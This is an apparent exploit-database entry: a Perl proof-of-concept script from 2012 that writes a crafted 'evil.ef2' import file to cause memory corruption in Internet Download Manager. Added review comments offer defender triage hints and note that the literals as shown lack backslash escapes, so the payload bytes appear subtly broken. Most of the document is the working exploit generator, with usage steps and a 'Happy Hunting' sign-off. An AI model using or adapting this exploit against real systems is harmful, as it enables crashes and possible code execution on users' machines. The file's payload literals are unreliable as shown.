
# Title : Internet Download Manager All Versions Memory Corruption Vulnerability
# Published : 2012-08-31
# Author :


#!/usr/bin/perl
# 1               ==========================================               1
# 0                   I'm Dark-Puzzle From Inj3ct0r TEAM                   0
# 0                                                                        1
# 1                       dark-puzzle[at]live[at]fr                        0
# 0               ==========================================               1
# 1                              White Hat                                 1
# 0                         Independent Pentester                          0
# 1                      exploit coder/bug researcher                      0
# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
# Title  : Internet Download Manager All Versions - Memory Corruption Vulnerability .
# Author : Dark-Puzzle (Souhail Hammou)
# Type   : Local 
# Risk   : Critical
# Vendor : Tonec Inc.
# Versions : All versions supporting the IDM file importation are Vulnerable .
# Tested On : Windows XP Service Pack 2 FR 32-bits , Windows 7 FR 64-bits
# Date : 31 August 2012
# Gr337ings to : Inj3ct0r Team - Packetstormsecurity.org - Securityfocus.com - Jigsaw - Dark-Soldier ...

#Vulnerability Details : Work your skills & imagination .


#Usage   : Copy this script to memorycorruption.pl
#Execute : perl memorycorruption.pl

#Howto : Go to Tasks ---> Import ---> From IDM export file ---> evil.ef2  (executing file as .eif may also work )
#              Taches --> Importer -> Depuis un fichier IDM ---> evil.ef2


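use strict;
use warnings;

# Proof-of-concept generator: writes "evil.ef2", the file the header's Howto
# feeds to Internet Download Manager's "Import -> From IDM export file" to
# reproduce the reported memory corruption.
#
# Layout of the generated file, in write order:
#   entry 1: $hd . $ht . $lk . $ed                  - a short entry
#   entry 2: $hd . $ht . $txt . $stx . $fake . $ed  - same framing, with the
#            URL field padded by two long filler runs (2,000,000 and 400,000
#            repetitions)
#
# NOTE(review): every literal below is reproduced exactly as it appears on
# this page. As shown they contain no backslash escapes, so Perl treats them
# as plain text ("x3cn" is the four characters x, 3, c, n).
#
# Defender notes: the page names no patched version, so the fixed release has
# to be confirmed with the vendor. A practical triage signal is an .ef2/.eif
# file holding a single entry that runs to several megabytes, far longer than
# any real download URL.

my $hd   = "x3cn";                     # written before each entry (presumably the record opener)
my $ed   = "x3en";                     # written after each entry (presumably the record closer)
my $ht   = "x68x74x74x70x3ax2fx2f";    # URL prefix shared by both entries
my $lk   = "x77x77x77x2ex31x33x33x37x64x61x79x2ex63x6fx6dx2fx65x78x70x6cx6fx69x74x73x2fx31x39x32x31x31n";    # rest of entry 1's URL
my $fake = "x2ex63x6fx6dx2fx64x61x72x6bx70x75x7ax7ax6cx65x2ex74x78x74n";    # tail placed after the filler in entry 2
my $txt  = "x41" x 2000000;            # first filler run
my $stx  = "x42" x 400000;             # second filler run
my $null = "x00x00"; # Not Necessary , but maybe more effective .
                     # (declared by the author but never written to the file)

# Sorry Script Kiddies ...
# BOF is possible and every failed attempt will cause a Denial of Service Vulnerability .

my $file = "evil.ef2";

print " Exploit By Dark-Puzzle n";
print " Creating Evil File , Please Wait ...nnn";

# Three-argument open with a lexical handle: the mode can no longer be
# influenced by the file name, and a failure stops the script instead of
# falling through to the success message.
open(my $out_fh, '>', $file)
    or die "Cannot open $file for writing: $!\n";

print {$out_fh} join('', $hd, $ht, $lk, $ed, $hd, $ht, $txt, $stx, $fake, $ed)
    or die "Cannot write to $file: $!\n";

# Buffered write errors only surface at close, so check it as well.
close($out_fh)
    or die "Cannot close $file: $!\n";

sleep(5);    # cosmetic pause kept from the original; the file is already complete
print " Evil File Created Successfully , Happy Hunting :)n";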

# Datasec Team .